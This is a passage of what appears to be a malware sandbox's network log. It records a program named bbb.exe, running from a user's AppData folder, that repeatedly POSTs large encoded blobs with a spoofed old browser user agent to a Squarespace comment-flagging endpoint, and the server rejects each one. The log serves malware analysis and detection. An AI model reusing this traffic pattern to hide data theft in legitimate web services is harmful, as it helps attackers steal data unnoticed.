UQ1edIn46zm0TRBfyH7BooSU1oP1qeJVjvOQXnqbsFcruotOFhWFQKdzd3vdpIGPtp%2BSImACSaGWyHdsoYYAN79PLue0zrYOm%2B9KDe7U4v6EZtCTQkTXQyKJeF0jyoDArB9RhBCJ3D7EPgNM7M80W9RycJ8DDQNfGSll3w1vPhbYtnSGzB63MTda4bNXgEPfh5PQxHABWoU8vyHfb/crWobDd2RqWb8s/bHFnOIxQXyxbsxCHEhXhdGZ%2B
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 74 4e 33 4d 70 4f 38 51 68 71 6f 44 72 47 78 48 6e 58 4e 72 32 71 31 76 4d 70 74 70 33 61 7a 57 57 61 4f 58 36 36 6b 42 25 32 42 4d 75 6d 46 2f 5a 78 4e 70 74 50 73 37 73 59 71 53 6a 72 46 36 37 72 66 6a 77 47 5a 25 32 42 65 62 4c 7a 50 61 71 46 77 6b 30 4d 73 6e 4f 36 31 36 31 4d 6e 78 65 6f 55 64 69 59 77 53 34 79 76 79 56 2f 62 4a 37 73 32 69 53 61 51 56 36 77 47 2f 25 32 42 48 70 6a 61 6a 53 59 52 78 38 42 33 4a 2f 68 56 7a 39 69 73 70 6c 30 56 6f 30 2f 32 39 70 25 32 42 57 44 56 70 51 57 4e 53 6a 54 47 39 6e 79 43 5a 4a 4d 6c 63 33 68 66 4a 72 51 73 75 52 4b 44 6d 74 52 43 39 78 6a 63 38 65 5a 62 34 4f 37 38 62 46 36 65 33 4a 50 36 43 6f 47 72 4e 47 51 79 70 52 72 57 55 5a 6c 30 52 73 6f 50 63 67 67 31 72 7a 45 2f 5a 6d 4d 6f 68 2f 66 6a 61 56 6f 37 Data Ascii: tN3MpO8QhqoDrGxHnXNr2q1vMptp3azWWaOX66kB%2BMumF/ZxNptPs7sYqSjrF67rfjwGZ%2BebLzPaqFwk0MsnO6161MnxeoUdiYwS4yvyV/bJ7s2iSaQV6wG/%2BHpjajSYRx8B3J/hVz9ispl0Vo0/29p%2BWDVpQWNSjTG9nyCZJMlc3hfJrQsuRKDmtRC9xjc8eZb4O78bF6e3JP6CoGrNGQypRrWUZl0RsoPcgg1rzE/ZmMoh/fjaVo7
2024-09-01 19:56:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXE7sHHpJgPTZDBiMDcwYTNhODNmOTc4ZmZjZDVmYzhjZTdkODIz; Path=/; Secure Set-Cookie: crumb=BX6SlECrYyE4MTEwNGU1NDNmZTI5OWVhZTQzZTViYTkzNzQyM2M2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BDvbEe4D/lynnw3yq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BX6SlECrYyE4MTEwNGU1NDNmZTI5OWVhZTQzZTViYTkzNzQyM2M2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49863	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:55 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 110888 Expect: 100-continue
2024-09-01 19:56:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 79 46 6b 47 33 2f 48 25 32 42 6d 66 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzyFkG3/H%2BmfHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 49 48 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f Data Ascii: IHJ8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTco
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 65 6d 6a 6c 34 45 6f 51 6a 76 34 64 2f 6a 6a 57 75 79 42 62 77 41 56 61 73 5a 58 7a 39 4e 41 43 32 48 76 44 48 6c 69 51 6c 79 7a 50 78 4f 73 64 46 69 39 57 38 34 56 74 43 54 58 51 79 33 38 41 51 50 69 6a 67 31 35 72 25 32 42 41 55 48 6c 73 7a 54 6f 71 6e 46 2f 5a 6b 65 79 38 56 62 66 54 25 32 42 58 41 6a 4e 4d 61 59 73 41 6f 79 55 46 4b 41 6e 4e 77 59 50 34 4c 4b 31 4c 55 4d 31 68 37 66 63 63 35 64 71 5a 6a 38 75 4a 4c 6c 70 33 4a 76 43 63 53 41 7a 34 56 42 6c 50 25 32 42 5a 37 68 4e 7a 4f 6d 55 39 66 65 71 31 4a 42 52 59 68 48 78 6e 44 77 37 73 6d 4c 4c 59 7a 6f 4b 46 61 4e 55 67 65 55 6d 25 32 42 31 6e 4e 43 63 62 7a 75 61 34 51 57 59 61 45 70 65 50 78 7a 6a 74 4a 4f 6f 68 5a 74 5a 34 44 52 6d 41 34 50 79 57 48 6c 44 7a 30 78 30 30 64 43 68 36 62 76 79 Data Ascii: emjl4EoQjv4d/jjWuyBbwAVasZXz9NAC2HvDHliQlyzPxOsdFi9W84VtCTXQy38AQPijg15r%2BAUHlszToqnF/Zkey8VbfT%2BXAjNMaYsAoyUFKAnNwYP4LK1LUM1h7fcc5dqZj8uJLlp3JvCcSAz4VBlP%2BZ7hNzOmU9feq1JBRYhHxnDw7smLLYzoKFaNUgeUm%2B1nNCcbzua4QWYaEpePxzjtJOohZtZ4DRmA4PyWHlDz0x00dCh6bvy
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 4b Data Ascii: K
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 75 45 50 6d 61 7a 5a 25 32 42 66 77 4c 4d 75 31 57 53 6f 4a 46 48 6a 4b 6b 25 32 42 6b 4f 46 51 4d 43 48 69 53 73 34 38 79 61 39 72 67 54 63 78 4c 64 48 54 73 49 59 44 49 65 43 55 41 44 56 74 52 6d 6f 66 39 6b 75 77 38 25 32 42 50 53 38 5a 30 72 38 73 64 65 4f 7a 6b 61 32 39 58 52 72 47 42 31 69 32 37 45 33 6a 72 2f 25 32 42 39 4e 46 39 51 2f 57 6d 59 36 5a 44 38 65 61 78 74 52 6b 39 57 59 49 39 76 55 50 31 70 6d 4f 6d 51 2f 48 6c 52 63 4e 71 73 4d 35 4b 4f 4b 4a 54 77 6e 56 53 6f 62 77 4c 68 39 44 2f 76 53 25 32 42 66 4e 4f 31 68 64 57 4b 34 32 48 69 6c 38 37 70 30 62 4a 77 45 78 43 62 39 62 53 33 66 77 49 53 51 43 52 72 51 37 43 77 32 36 32 68 33 33 4c 71 56 42 51 67 39 69 30 64 69 76 72 33 41 57 38 42 54 57 45 44 54 39 64 32 64 70 6c 31 62 44 79 46 32 Data Ascii: uEPmazZ%2BfwLMu1WSoJFHjKk%2BkOFQMCHiSs48ya9rgTcxLdHTsIYDIeCUADVtRmof9kuw8%2BPS8Z0r8sdeOzka29XRrGB1i27E3jr/%2B9NF9Q/WmY6ZD8eaxtRk9WYI9vUP1pmOmQ/HlRcNqsM5KOKJTwnVSobwLh9D/vS%2BfNO1hdWK42Hil87p0bJwExCb9bS3fwISQCRrQ7Cw262h33LqVBQg9i0divr3AW8BTWEDT9d2dpl1bDyF2
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 57 Data Ascii: W
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 31 72 32 53 4a 58 76 50 32 65 72 62 62 6e 25 32 42 33 72 42 4b 30 63 6d 37 6e 79 31 58 79 4c 71 64 6f 52 78 51 33 36 34 71 74 72 34 56 2f 75 37 62 4b 38 51 31 76 6d 49 68 45 4e 56 4e 4f 30 45 69 56 56 6e 5a 73 33 32 47 78 4b 65 48 69 37 76 4c 70 47 25 32 42 6b 34 68 6c 4f 32 31 38 68 59 73 71 6a 74 66 55 55 7a 77 53 4d 79 6e 69 55 46 50 45 25 32 42 73 45 59 52 45 79 56 38 57 71 2f 79 6d 4a 7a 76 79 6b 39 62 62 42 75 58 4d 46 30 79 47 42 31 64 58 4f 79 6c 6f 69 37 79 6e 4d 59 48 49 5a 33 52 57 4e 77 39 6b 6e 7a 25 32 42 39 4a 51 34 69 64 7a 75 34 4e 76 52 4a 6d 43 50 38 7a 6e 66 34 30 54 4a 4e 53 33 48 71 38 36 33 77 35 41 4d 58 68 59 59 56 78 32 30 73 55 74 37 56 65 6e 6f 30 35 36 65 61 73 2f 55 4b 79 48 53 52 6f 4e 59 34 73 69 4b 47 46 72 61 43 31 5a 73 Data Ascii: 1r2SJXvP2erbbn%2B3rBK0cm7ny1XyLqdoRxQ364qtr4V/u7bK8Q1vmIhENVNO0EiVVnZs32GxKeHi7vLpG%2Bk4hlO218hYsqjtfUUzwSMyniUFPE%2BsEYREyV8Wq/ymJzvyk9bbBuXMF0yGB1dXOyloi7ynMYHIZ3RWNw9knz%2B9JQ4idzu4NvRJmCP8znf40TJNS3Hq863w5AMXhYYVx20sUt7Veno056eas/UKyHSRoNY4siKGFraC1Zs
2024-09-01 19:56:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:55 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVFAR0A9QJyrYTNmNWY4NWYwY2RjNmUzYmVjYmNiZWZkNTY2ODY3; Path=/; Secure Set-Cookie: crumb=BaUPEmU74Lc5NzIzODRhMmZmZTg5MjY1ZDU4NGM1MTg1OTJkY2Fm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: v5ySljeR/8QsIVNBY Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaUPEmU74Lc5NzIzODRhMmZmZTg5MjY1ZDU4NGM1MTg1OTJkY2Fm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49864	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:56 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:56 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSAwDNuYH4WoMTg5ODcyNGNkZTE2NWYxODNhODQyZDU2YjcxY2Y1; Path=/; Secure Set-Cookie: crumb=BcTD8NWp9YDZYzA4YzljZTVmMmI0YzllNmZhYWU4MzQ5YzNhYzA3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: B6dQHc6O/wgybJil3 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcTD8NWp9YDZYzA4YzljZTVmMmI0YzllNmZhYWU4MzQ5YzNhYzA3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49865	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:56 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:56 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSxrDKRsdJPONTk5YTNmYmJmOTU5OGYxNzkwZTk5Yzg2ODIxM2Vh; Path=/; Secure Set-Cookie: crumb=BeGep6UfpyK5MDBiMWJmNjAyZGQ4MWJhZWYxNTBmM2Q2NDM5MjE5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: j3t35Va9/VyNt9JeL Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeGep6UfpyK5MDBiMWJmNjAyZGQ4MWJhZWYxNTBmM2Q2NDM5MjE5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49866	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:56 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:56 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVRJuRFzwyMZMjliNzFjYjdkOWJiZGNlZGJiOTNmMTM5ZDkzZTk4; Path=/; Secure Set-Cookie: crumb=BYFRte2Z-6BRMzZiN2ZkODAwYzc0YjA3ODA1NjdkZGVjOWM1MzI3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: AJwkb2kz/fAhvAJ3x Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYFRte2Z-6BRMzZiN2ZkODAwYzc0YjA3ODA1NjdkZGVjOWM1MzI3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49868	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:57 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 109600 Expect: 100-continue
2024-09-01 19:56:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:58 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 79 43 47 51 43 68 30 53 44 36 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxyCGQCh0SD6nbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:58 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:56:58 UTC	16306	OUT	Data Raw: 44 77 70 4c 31 5a 48 34 4f 78 75 4b 50 6f 34 52 69 4a 6e 36 31 38 57 48 47 70 68 47 51 62 5a 45 7a 4a 4d 79 2f 56 4b 34 77 50 65 25 32 42 46 4f 68 59 33 45 74 71 38 75 41 50 71 30 68 75 70 55 69 74 37 6c 4c 74 65 77 53 77 6f 4f 73 65 6b 44 45 6b 56 6a 49 35 6e 6f 56 53 77 47 38 4d 43 6a 7a 31 74 51 76 47 6c 7a 4c 37 63 38 47 54 62 4e 48 5a 65 36 4c 30 6c 56 34 47 55 64 38 38 58 67 72 65 39 2f 31 4a 46 54 70 4d 55 72 79 45 32 51 35 4c 59 5a 4c 64 69 78 2f 65 45 4e 2f 55 4e 68 4c 25 32 42 63 33 6c 6f 63 48 7a 4d 44 4b 45 49 6a 32 68 42 31 64 64 4e 71 56 56 70 78 45 38 25 32 42 73 53 47 32 67 64 79 6d 47 57 35 45 67 33 4c 6e 74 63 42 48 4b 36 37 73 73 44 6d 72 67 49 4b 39 63 55 55 39 6c 43 52 62 59 63 57 48 32 49 4e 54 72 57 70 4b 6d 64 41 77 75 6b 57 4b 41 Data Ascii: DwpL1ZH4OxuKPo4RiJn618WHGphGQbZEzJMy/VK4wPe%2BFOhY3Etq8uAPq0hupUit7lLtewSwoOsekDEkVjI5noVSwG8MCjz1tQvGlzL7c8GTbNHZe6L0lV4GUd88Xgre9/1JFTpMUryE2Q5LYZLdix/eEN/UNhL%2Bc3locHzMDKEIj2hB1ddNqVVpxE8%2BsSG2gdymGW5Eg3LntcBHK67ssDmrgIK9cUU9lCRbYcWH2INTrWpKmdAwukWKA
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
